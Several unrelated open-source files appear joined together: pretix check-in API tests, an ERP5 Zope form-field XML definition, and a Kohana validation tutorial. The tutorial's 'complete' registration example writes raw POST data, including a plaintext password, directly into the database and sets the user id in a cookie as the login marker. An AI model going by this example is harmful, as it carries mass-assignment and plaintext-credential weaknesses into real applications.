assert resp.status_code == 200
with scopes_disabled():
cl = CheckinList.objects.get(pk=resp.data['id'])
assert cl.name == "VIP"
resp = token_client.patch(
'/api/v1/organizers/{}/events/{}/checkinlists/{}/'.format(organizer.slug, event.slug, clist.pk),
{
"auto_checkin_sales_channels": [
"web"
],
},
format='json'
)
assert resp.status_code == 200
with scopes_disabled():
cl = CheckinList.objects.get(pk=resp.data['id'])
assert "web" in cl.auto_checkin_sales_channels
@pytest.mark.django_db
def test_list_all_items_positions(token_client, organizer, event, clist, clist_all, item, other_item, order):
with scopes_disabled():
p1 = dict(TEST_ORDERPOSITION1_RES)
p1["id"] = order.positions.first().pk
p1["item"] = item.pk
p2 = dict(TEST_ORDERPOSITION2_RES)
p2["id"] = order.positions.last().pk
p2["item"] = other_item.pk
# All items
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=positionid'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p1, p2] == resp.data['results']
# Check-ins on other list ignored
with scopes_disabled():
order.positions.first().checkins.create(list=clist)
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=positionid'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p1, p2] == resp.data['results']
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?has_checkin=1'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [] == resp.data['results']
# Only checked in
with scopes_disabled():
c = order.positions.first().checkins.create(list=clist_all)
p1['checkins'] = [
{
'id': c.pk,
'list': clist_all.pk,
'datetime': c.datetime.isoformat().replace('+00:00', 'Z'),
'auto_checked_in': False,
'type': 'entry',
}
]
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?has_checkin=1'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p1] == resp.data['results']
# Only not checked in
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?has_checkin=0'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p2] == resp.data['results']
# Order by checkin
resp = token_client.get(
'/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=-last_checked_in'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p1, p2] == resp.data['results']
resp = token_client.get(
'/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=last_checked_in'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p2, p1] == resp.data['results']
# Order by checkin date
time.sleep(1)
with scopes_disabled():
c = order.positions.last().checkins.create(list=clist_all)
p2['checkins'] = [
{
'id': c.pk,
'list': clist_all.pk,
'datetime': c.datetime.isoformat().replace('+00:00', 'Z'),
'auto_checked_in': False,
'type': 'entry',
}
]
resp = token_client.get(
'/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=-last_checked_in'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p2, p1] == resp.data['results']
# Order by attendee_name
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=-attendee_name'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p1, p2] == resp.data['results']
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=attendee_name'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p2, p1] == resp.data['results']
# Paid only
order.status = Order.STATUS_PENDING
order.save()
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [] == resp.data['results']
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ignore_status=true'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
p1['order__status'] = 'n'
p2['order__status'] = 'n'
assert [p2, p1] == resp.data['results']
@pytest.mark.django_db
def test_list_all_items_positions_by_subevent(token_client, organizer, event, clist, clist_all, item, other_item, order, subevent):
with scopes_disabled():
se2 = event.subevents.create(name="Foobar", date_from=datetime.datetime(2017, 12, 27, 10, 0, 0, tzinfo=UTC))
pfirst = order.positions.first()
pfirst.subevent = se2
pfirst.save()
p1 = dict(TEST_ORDERPOSITION1_RES)
p1["id"] = pfirst.pk
p1["subevent"] = se2.pk
p1["item"] = item.pk
plast = order.positions.last()
plast.subevent = subevent
plast.save()
p2 = dict(TEST_ORDERPOSITION2_RES)
p2["id"] = plast.pk
p2["item"] = other_item.pk
p2["subevent"] = subevent.pk
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=positionid'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p1, p2] == resp.data['results']
clist_all.subevent = subevent
clist_all.save()
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=positionid'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p2] == resp.data['results']
@pytest.mark.django_db
def test_list_limited_items_positions(token_client, organizer, event, clist, item, order):
p1 = dict(TEST_ORDERPOSITION1_RES)
with scopes_disabled():
p1["id"] = order.positions.first().pk
p1["item"] = item.pk
# All items
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=positionid'.format(
organizer.slug, event.slug, clist.pk
))
assert resp.status_code == 200
assert [p1] == resp.data['results']
@pytest.mark.django_db
def test_list_limited_items_position_detail(token_client, organizer, event, clist, item, order):
p1 = dict(TEST_ORDERPOSITION1_RES)
with scopes_disabled():
p1["id"] = order.positions.first().pk
p1["item"] = item.pk
# All items
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/'.format(
organizer.slug, event.slug, clist.pk, p1["id"]
))
assert resp.status_code == 200
assert p1 == resp.data
@pytest.mark.django_db
def test_status(token_client, organizer, event, clist_all, item, other_item, order):
with scopes_disabled():
op = order.positions.first()
var1 = item.variations.create(value="XS")
var2 = item.variations.create(value="S")
op.variation = var1
op.save()
Checkin.objects.create(position=op, list=clist_all)
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/status/'.format(
organizer.slug, event.slug, clist_all.pk,
))
assert resp.status_code == 200
assert resp.data['checkin_count'] == 1
assert resp.data['position_count'] == 2
assert resp.data['items'] == [
{
'name': str(item.name),
'id': item.pk,
'checkin_count': 1,
'admission': False,
'position_count': 1,
'variations': [
{
'id': var1.pk,
'value': 'XS',
'checkin_count': 1,
'position_count': 1,
},
{
'id': var2.pk,
'value': 'S',
'checkin_count': 0,
'position_count': 0,
},
]
},
{
'name': other_item.name,
'id': other_item.pk,
'checkin_count': 0,
'admission': False,
'position_count': 1,
'variations': []
}
]
@pytest.mark.django_db
def test_custom_datetime(token_client, organizer, clist, event, order):
dt = now() - datetime.timedelta(days=1)
dt = dt.replace(microsecond=0)
with scopes_disabled():
p = order.positions.first().pk
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p
), {
'datetime': dt.isoformat()
}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
with scopes_disabled():
assert Checkin.objects.last().datetime == dt
@pytest.mark.django_db
def test_name_fallback(token_client, organizer, clist, event, order):
order.invoice_address.name_parts = {'_legacy': 'Paul'}
order.invoice_address.save()
with scopes_disabled():
op = order.positions.first()
op.attendee_name_cached = None
op.attendee_name_parts = {}
op.save()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, op.pk
), {}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
assert resp.data['position']['attendee_name'] == 'Paul'
assert resp.data['position']['attendee_name_parts'] == {'_legacy': 'Paul'}
@pytest.mark.django_db
def test_by_secret(token_client, organizer, clist, event, order):
with scopes_disabled():
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.secret
), {}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
@pytest.mark.django_db
def test_only_once(token_client, organizer, clist, event, order):
with scopes_disabled():
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'error'
assert resp.data['reason'] == 'already_redeemed'
@pytest.mark.django_db
def test_reupload_same_nonce(token_client, organizer, clist, event, order):
with scopes_disabled():
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'nonce': 'foobar'}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'nonce': 'foobar'}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
@pytest.mark.django_db
def test_allow_multiple(token_client, organizer, clist, event, order):
clist.allow_multiple_entries = True
clist.save()
with scopes_disabled():
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
with scopes_disabled():
assert p.checkins.count() == 2
@pytest.mark.django_db
def test_allow_multiple_reupload_same_nonce(token_client, organizer, clist, event, order):
clist.allow_multiple_entries = True
clist.save()
with scopes_disabled():
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'nonce': 'foobar'}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'nonce': 'foobar'}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
with scopes_disabled():
assert p.checkins.count() == 1
@pytest.mark.django_db
def test_multiple_different_list(token_client, organizer, clist, clist_all, event, order):
with scopes_disabled():
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'nonce': 'foobar'}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist_all.pk, p.pk
), {'nonce': 'baz'}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
@pytest.mark.django_db
def test_forced_multiple(token_client, organizer, clist, event, order):
with scopes_disabled():
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'force': True}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
@pytest.mark.django_db
def test_require_product(token_client, organizer, clist, event, order):
with scopes_disabled():
clist.limit_products.clear()
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'error'
assert resp.data['reason'] == 'product'
@pytest.mark.django_db
def test_require_paid(token_client, organizer, clist, event, order):
with scopes_disabled():
p = order.positions.first()
order.status = Order.STATUS_CANCELED
order.save()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'error'
assert resp.data['reason'] == 'unpaid'
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'canceled_supported': True}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'error'
assert resp.data['reason'] == 'canceled'
order.status = Order.STATUS_PENDING
order.save()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'error'
assert resp.data['reason'] == 'unpaid'
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'ignore_unpaid': True}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'error'
assert resp.data['reason'] == 'unpaid'
clist.include_pending = True
clist.save()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'error'
assert resp.data['reason'] == 'unpaid'
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'ignore_unpaid': True}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
@pytest.fixture
def question(event, item):
q = event.questions.create(question=LazyI18nString('Size'), type='C', required=True, ask_during_checkin=True)
a1 = q.options.create(answer=LazyI18nString("M"))
a2 = q.options.create(answer=LazyI18nString("L"))
q.items.add(item)
return q, a1, a2
@pytest.mark.django_db
def test_question_number(token_client, organizer, clist, event, order, question):
with scopes_disabled():
p = order.positions.first()
question[0].options.all().delete()
question[0].type = 'N'
question[0].save()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'incomplete'
with scopes_disabled():
assert resp.data['questions'] == [QuestionSerializer(question[0]).data]
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'answers': {question[0].pk: "3.24"}}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
with scopes_disabled():
assert order.positions.first().answers.get(question=question[0]).answer == '3.24'
@pytest.mark.django_db
def test_question_choice(token_client, organizer, clist, event, order, question):
with scopes_disabled():
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'incomplete'
with scopes_disabled():
assert resp.data['questions'] == [QuestionSerializer(question[0]).data]
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'answers': {question[0].pk: str(question[1].pk)}}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
with scopes_disabled():
assert order.positions.first().answers.get(question=question[0]).answer == 'M'
assert list(order.positions.first().answers.get(question=question[0]).options.all()) == [question[1]]
@pytest.mark.django_db
def test_question_choice_identifier(token_client, organizer, clist, event, order, question):
with scopes_disabled():
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'incomplete'
with scopes_disabled():
assert resp.data['questions'] == [QuestionSerializer(question[0]).data]
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'answers': {question[0].pk: str(question[1].identifier)}}, format='json')
print(resp.data)
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
with scopes_disabled():
assert order.positions.first().answers.get(question=question[0]).answer == 'M'
assert list(order.positions.first().answers.get(question=question[0]).options.all()) == [question[1]]
@pytest.mark.django_db
def test_question_invalid(token_client, organizer, clist, event, order, question):
with scopes_disabled():
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'answers': {question[0].pk: "A"}}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'incomplete'
with scopes_disabled():
assert resp.data['questions'] == [QuestionSerializer(question[0]).data]
@pytest.mark.django_db
def test_question_required(token_client, organizer, clist, event, order, question):
with scopes_disabled():
p = order.positions.first()
question[0].required = True
question[0].save()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'incomplete'
with scopes_disabled():
assert resp.data['questions'] == [QuestionSerializer(question[0]).data]
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'answers': {question[0].pk: ""}}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'incomplete'
with scopes_disabled():
assert resp.data['questions'] == [QuestionSerializer(question[0]).data]
@pytest.mark.django_db
def test_question_optional(token_client, organizer, clist, event, order, question):
with scopes_disabled():
p = order.positions.first()
question[0].required = False
question[0].save()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'incomplete'
with scopes_disabled():
assert resp.data['questions'] == [QuestionSerializer(question[0]).data]
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'answers': {question[0].pk: ""}}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
@pytest.mark.django_db
def test_question_multiple_choice(token_client, organizer, clist, event, order, question):
with scopes_disabled():
p = order.positions.first()
question[0].type = 'M'
question[0].save()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'incomplete'
with scopes_disabled():
assert resp.data['questions'] == [QuestionSerializer(question[0]).data]
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'answers': {question[0].pk: "{},{}".format(question[1].pk, question[2].pk)}}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
with scopes_disabled():
assert order.positions.first().answers.get(question=question[0]).answer == 'M, L'
assert set(order.positions.first().answers.get(question=question[0]).options.all()) == {question[1], question[2]}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0"?>
<ZopeData>
<record id="1" aka="AAAAAAAAAAE=">
<pickle>
<global name="ProxyField" module="Products.ERP5Form.ProxyField"/>
</pickle>
<pickle>
<dictionary>
<item>
<key> <string>delegated_list</string> </key>
<value>
<list>
<string>title</string>
</list>
</value>
</item>
<item>
<key> <string>id</string> </key>
<value> <string>my_configuration_translation_gadget_url</string> </value>
</item>
<item>
<key> <string>message_values</string> </key>
<value>
<dictionary>
<item>
<key> <string>external_validator_failed</string> </key>
<value> <string>The input failed the external validator.</string> </value>
</item>
</dictionary>
</value>
</item>
<item>
<key> <string>overrides</string> </key>
<value>
<dictionary>
<item>
<key> <string>field_id</string> </key>
<value> <string></string> </value>
</item>
<item>
<key> <string>form_id</string> </key>
<value> <string></string> </value>
</item>
<item>
<key> <string>target</string> </key>
<value> <string></string> </value>
</item>
</dictionary>
</value>
</item>
<item>
<key> <string>tales</string> </key>
<value>
<dictionary>
<item>
<key> <string>field_id</string> </key>
<value> <string></string> </value>
</item>
<item>
<key> <string>form_id</string> </key>
<value> <string></string> </value>
</item>
<item>
<key> <string>target</string> </key>
<value> <string></string> </value>
</item>
</dictionary>
</value>
</item>
<item>
<key> <string>values</string> </key>
<value>
<dictionary>
<item>
<key> <string>field_id</string> </key>
<value> <string>my_view_mode_reference</string> </value>
</item>
<item>
<key> <string>form_id</string> </key>
<value> <string>Base_viewFieldLibrary</string> </value>
</item>
<item>
<key> <string>target</string> </key>
<value> <string>Click to edit the target</string> </value>
</item>
<item>
<key> <string>title</string> </key>
<value> <string>Translation Gadget</string> </value>
</item>
</dictionary>
</value>
</item>
</dictionary>
</pickle>
</record>
</ZopeData>
| {
"pile_set_name": "Github"
} |
# Validation
*This page needs to be reviewed for accuracy by the development team. Better examples would be helpful.*
Validation can be performed on any array using the [Validation] class. Labels and rules can be attached to a Validation object by the array key, called a "field name".
labels
: A label is a human-readable version of the field name.
rules
: A rule is a callback or closure used to decide whether or not to add an error to a field.
[!!] Note that any valid [PHP callback](http://php.net/manual/language.pseudo-types.php#language.types.callback) can be used as a rule.
A rule added with `TRUE` as the field name will be applied to all named fields.
Creating a validation object is done using the [Validation::factory] method:
$object = Validation::factory($array);
[!!] The `$object` object will be used for the rest of this tutorial. This tutorial will show you how to validate the registration of a new user.
## Provided Rules
Kohana provides a set of useful rules in the [Valid] class:
Rule name | Function
------------------------- |-------------------------------------------------
[Valid::not_empty] | Value must be a non-empty value
[Valid::regex] | Match the value against a regular expression
[Valid::min_length] | Minimum number of characters for value
[Valid::max_length] | Maximum number of characters for value
[Valid::exact_length] | Value must be an exact number of characters
[Valid::email] | An email address is required
[Valid::email_domain] | Check that the domain of the email exists
[Valid::url] | Value must be a URL
[Valid::ip] | Value must be an IP address
[Valid::phone] | Value must be a phone number
[Valid::credit_card] | Require a credit card number
[Valid::date] | Value must be a date (and time)
[Valid::alpha] | Only alpha characters allowed
[Valid::alpha_dash] | Only alpha and hyphens allowed
[Valid::alpha_numeric] | Only alpha and numbers allowed
[Valid::digit] | Value must be an integer digit
[Valid::decimal] | Value must be a decimal or float value
[Valid::numeric] | Only numeric characters allowed
[Valid::range] | Value must be within a range
[Valid::color] | Value must be a valid HEX color
[Valid::matches] | Value matches another field value
## Adding Rules
All validation rules are defined as a field name, a method, a function (using the [PHP callback](http://php.net/callback) syntax) or [closure](http://php.net/manual/functions.anonymous.php), and an array of parameters:
$object->rule($field, $callback, array($parameter1, $parameter2));
If no parameters are specified, the field value will be passed to the callback. The following two rules are equivalent:
$object->rule($field, 'not_empty');
$object->rule($field, 'not_empty', array(':value'));
Rules defined in the [Valid] class can be added by using the method name alone. The following three rules are equivalent:
$object->rule('number', 'phone');
$object->rule('number', array('Valid', 'phone'));
$object->rule('number', 'Valid::phone');
### Adding Rules for multiple fields together
To validate multiple fields together, you can do something like this:
$object->rule('one', 'only_one', array(':validation', array('one', 'two')));
$object->rule('two', 'only_one', array(':validation', array('one', 'two')));
public function only_one($validation, $fields)
{
// If more than 1 field is set, bail.
$matched = 0;
foreach ($fields as $field)
{
if (isset($validation[$field]))
{
$matched++;
}
}
        if ($matched > 1)
{
// Add the error to all concerned fields
foreach ($fields as $field)
{
$validation->error($field, 'only_one');
}
}
}
## Binding Variables
The [Validation] class allows you to bind variables to certain strings so that they can be used when defining rules. Variables are bound by calling the [Validation::bind] method.
$object->bind(':model', $user_model);
// Future code will be able to use :model to reference the object
$object->rule('username', 'some_rule', array(':model'));
By default, the validation object will automatically bind the following values for you to use as rule parameters (a short example follows this list):
- `:validation` - references the validation object
- `:field` - references the field name the rule is for
- `:value` - references the value of the field the rule is for
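For example, a closure rule can receive all three bound values. This is a minimal sketch; the error key `reserved` is only illustrative:

    $object->rule('username', function($validation, $field, $value)
    {
        if (strtolower($value) === 'admin')
        {
            // This rule needs the validation object so it can add the error itself
            $validation->error($field, 'reserved');
        }
    }, array(':validation', ':field', ':value'));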
## Adding Errors
The [Validation] class will add an error for a field if any of the rules associated with it return `FALSE`. This allows many built-in PHP functions to be used as rules, like `in_array`.
$object->rule('color', 'in_array', array(':value', array('red', 'green', 'blue')));
Rules added to empty fields will run, but returning `FALSE` will not automatically add an error for the field. For a rule to affect empty fields, you must add the error manually by calling the [Validation::error] method, which requires passing the validation object to the rule.
$object->rule($field, 'the_rule', array(':validation', ':field'));
public function the_rule($validation, $field)
{
if (something went wrong)
{
$validation->error($field, 'the_rule');
}
}
[!!] `not_empty` and `matches` are the only rules that will run on empty fields and add errors by returning `FALSE`.
## Example
To start our example, we will perform validation on the HTTP POST data of the current request that contains user registration information:
[!!] In Kohana controllers, we access `$this->request->post()` instead of `$_POST` for better request isolation.
$object = Validation::factory($this->request->post());
Next we need to process the POST'ed information using [Validation]. To start, we need to add some rules:
$object
->rule('username', 'not_empty')
->rule('username', 'regex', array(':value', '/^[a-z_.]++$/iD'))
->rule('password', 'not_empty')
->rule('password', 'min_length', array(':value', '6'))
->rule('confirm', 'matches', array(':validation', 'confirm', 'password'))
->rule('use_ssl', 'not_empty');
Any existing PHP function can also be used as a rule. For instance, if we want to check if the user entered a proper value for the SSL question:
$object->rule('use_ssl', 'in_array', array(':value', array('yes', 'no')));
Note that all array parameters must still be wrapped in an array! Without the wrapping array, `in_array` would be called as `in_array($value, 'yes', 'no')`, which would result in a PHP error.
Any custom rule can be added using a [PHP callback](http://php.net/manual/language.pseudo-types.php#language.types.callback):
    $object->rule('username', 'Model_User::unique_username');
The method `Model_User::unique_username()` would be defined similarly to:
public static function unique_username($username)
{
// Check if the username already exists in the database
return ! DB::select(array(DB::expr('COUNT(username)'), 'total'))
->from('users')
->where('username', '=', $username)
->execute()
->get('total');
}
[!!] Custom rules allow many additional checks to be reused for multiple purposes. These methods will almost always exist in a model, but may be defined in any class.
# A Complete Example
First, we need a [View] that contains the HTML form, which will be placed in `application/views/user/register.php`:
<?php echo Form::open() ?>
<?php if ($errors): ?>
<p class="message">Some errors were encountered, please check the details you entered.</p>
<ul class="errors">
<?php foreach ($errors as $message): ?>
<li><?php echo $message ?></li>
    <?php endforeach ?>
    </ul>
    <?php endif ?>
<dl>
<dt><?php echo Form::label('username', 'Username') ?></dt>
<dd><?php echo Form::input('username', $post['username']) ?></dd>
<dt><?php echo Form::label('password', 'Password') ?></dt>
<dd><?php echo Form::password('password') ?></dd>
<dd class="help">Passwords must be at least 6 characters long.</dd>
<dt><?php echo Form::label('confirm', 'Confirm Password') ?></dt>
<dd><?php echo Form::password('confirm') ?></dd>
<dt><?php echo Form::label('use_ssl', 'Use extra security?') ?></dt>
<dd><?php echo Form::select('use_ssl', array('yes' => 'Always', 'no' => 'Only when necessary'), $post['use_ssl']) ?></dd>
<dd class="help">For security, SSL is always used when making payments.</dd>
</dl>
<?php echo Form::submit(NULL, 'Sign Up') ?>
<?php echo Form::close() ?>
[!!] This example uses the [Form] helper extensively. Using [Form] instead of writing HTML ensures that all of the form inputs will properly handle input that includes HTML characters. If you prefer to write the HTML yourself, be sure to use [HTML::chars] to escape user input.
Next, we need a controller and action to process the registration, which will be placed in `application/classes/Controller/User.php`:
class Controller_User extends Controller {
public function action_register()
{
$user = Model::factory('user');
$validation = Validation::factory($this->request->post())
->rule('username', 'not_empty')
->rule('username', 'regex', array(':value', '/^[a-z_.]++$/iD'))
->rule('username', array($user, 'unique_username'))
->rule('password', 'not_empty')
->rule('password', 'min_length', array(':value', 6))
->rule('confirm', 'matches', array(':validation', ':field', 'password'))
->rule('use_ssl', 'not_empty')
->rule('use_ssl', 'in_array', array(':value', array('yes', 'no')));
if ($validation->check())
{
// Data has been validated, register the user
$user->register($this->request->post());
// Always redirect after a successful POST to prevent refresh warnings
$this->redirect('user/profile', 302);
}
// Validation failed, collect the errors
$errors = $validation->errors('user');
// Display the registration form
$this->response->body(View::factory('user/register'))
->bind('post', $this->request->post())
->bind('errors', $errors);
}
}
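The `$validation->errors('user')` call reads its human-readable messages from a message file. A minimal sketch of such a file, placed in `application/messages/user.php` (the wording of each message is only an example):

    return array(
        'username' => array(
            'not_empty'       => 'You must provide a username.',
            'regex'           => 'Usernames may only contain letters, dots and underscores.',
            'unique_username' => 'That username is already taken.',
        ),
        'password' => array(
            'not_empty'  => 'You must provide a password.',
            'min_length' => 'Passwords must be at least 6 characters long.',
        ),
        'confirm' => array(
            'matches' => 'The password fields did not match.',
        ),
    );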
We will also need a user model, which will be placed in `application/classes/Model/User.php`:
class Model_User extends Model {
public function register($array)
{
// Create a new user record in the database
$id = DB::insert(array_keys($array))
->values($array)
->execute();
// Save the new user id to a cookie
cookie::set('user', $id);
return $id;
}
}
That is it, we have a complete user registration example that properly checks user input!
| {
"pile_set_name": "Github"
} |
/* ====================================================================
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
